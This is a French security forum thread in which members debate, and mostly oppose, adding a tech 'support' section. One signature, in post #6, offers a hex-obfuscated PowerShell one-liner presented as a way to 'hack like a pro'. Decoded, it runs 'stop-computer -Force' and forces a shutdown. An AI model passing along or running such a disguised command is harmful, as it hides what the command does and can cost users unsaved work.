Annonce

Réduire
Aucune annonce.

ajout d'une section "support"

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • ajout d'une section "support"

    Bonjour à tous, je me permets de poster ici afin de proposer mon idée :

    -Cette dernière serait l'ajout d'une section "support", ou encore "support informatique" : nous avons tous connus et connaissons encore aujourd'hui de nombreux problèmes avec nos ordinateurs, nos smartphones, etc, sans pour autant que ces derniers soient forcément reliés à la sécurité informatique.

    La section support permettrait donc à chacun d'exposer ses problèmes rencontrés avec l'utilisation de logiciels, avec son matériel, avec le réseau.... Sans vouloir transformer Hackademics en hotline bien sûr

    Certains d'entres vous me diront : "nous sommes sur une communauté de passionnés, on a tout de même un minimum de connaissances en informatiques, non ?", et ces derniers auront entièrement raison, mais malgré ses connaissances, tout le monde peut se retrouver un jour confronté à un problème qui le dépasse.

    D'autres ajouteront : "c'est bien joli tout ça, mais il existe déjà des forums entièrement dédiés à ce genre de problèmes", là encore, cet argument est facilement démontable : le fait de demander conseil à des personnes expérimentés en sécurité informatiques, voir à des professionnels pour certains membres d'Hackademics, permettrait d'avoir un avis fiable, et surtout une grande aide dans le cas d'un malware difficile à retirer de son ordinateur par exemple. (quoi de mieux pour enlever les malwares qu'une personne qui connaît leurs fonctionnements).

  • #2
    Salut,

    Je n'ai rien contre. Toutefois, la passion ne suffit pas pour connaître, en particulier pour tout connaître. Il est inutile et illusoire de penser que cette communauté est meilleure que d'autres.

    Personnellement, je prendrai plaisir à aider les membres de ce forum sous réserve qu'il y ait un certain effort en termes de réponse après la demande (ce qui n'est pas toujours le cas...) et à condition également qu'il y ait une démarche active dans la résolution desdits problèmes de la part de celui/celle qui en fait état.

    Une chose aussi, je ne veux pas voir ce genre de fils : https://forum.zebulon.fr/topic/22445...pports-joints/
    Où l'on n'en finit plus de poster des rapports aussi longs que (souvent) vides de sens. Des malwares éradiqués au bazooka lorsque d'aventure ça marche.

    L'intérêt est de comprendre pas de faire des recettes de cuisine...

    Mais quoique j'en dise, ce n'est pas à moi de décider de la création d'une telle section. Espérons qu'un admin passe...
    Dernière modification par Icarus, 04 novembre 2018, 12h15.

    Commentaire


    • #3
      Une chose aussi, je ne veux pas voir ce genre de fils : https://forum.zebulon.fr/topic/22445...pports-joints/
      Où l'on n'en finit plus de poster des rapports aussi longs que (souvent) vides de sens. Des malwares éradiqués au bazooka lorsque d'aventure ça marche.

      L'intérêt est de comprendre pas de faire des recettes de cuisine...]
      Entièrement d'accord, ce genre de posts n'a aucun sens, à quoi bon faire un copier coller des mêmes instructions pour la centième fois, au lieu d'expliquer la résolution du problème à l'utilisateur.
      Dernière modification par fred, 04 novembre 2018, 13h42.

      Commentaire


      • #4
        Bonjour,

        Dans l'ensemble des catégories déjà existantes sur le forum, il me semble étonnant qu'une d'elles ne te permette pas d'y placer ton problème. Peux-tu donner un exemple de difficulté rencontré et dont tu n'y trouveras pas place sur le forum ?

        Commentaire


        • #5
          Bonjour, je ne rencontre aucune difficulté particulière, je propose simplement l'ajout d'une section dédiée aux difficultés, afin d'éviter l'encombrement des sections "générales".

          Commentaire


          • #6
            Pas favorable pour les raisons déjà citées.
            Hack like a pro :
            PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

            Commentaire


            • #7
              Envoyé par UVision Voir le message
              Bonjour, je ne rencontre aucune difficulté particulière, je propose simplement l'ajout d'une section dédiée aux difficultés, afin d'éviter l'encombrement des sections "générales".
              Oui sans doute, seulement ce n'est pas lié à une mauvaise catégorie existante, mais à un mauvais choix de catégorie

              En choisissant une catégorie plus généraliste le PO risque de rencontrer des réponses généralistes et moins pointues si les experts d'un domaine n'y prêtent pas attention...
              En choisissant une catégorie précise, les experts du domaine participeront plus activement et auront sans doute plaisirs à répondre.

              En ce qui me concerne c'est ce que je fais, je suppose que d'autres le font et que d'autres, non ! Maintenant c'est une question ouverte à tous les admins du forum, il faut donc attendre que nous en discutions ensemble afin de préciser clairement si la réponse est oui ou non !

              Bonne soirée,

              Commentaire


              • #8
                Bonjour. Je n'y vois pas grande utilité. Si nous devions toucher à l'archi (sec/cat) ce serait plutôt pour l'alléger.
                sigpic

                Cyprium Download Link

                Plus j'étudie plus j'me rends compte que je n'sais rien.

                †|

                Commentaire

                Chargement...
                X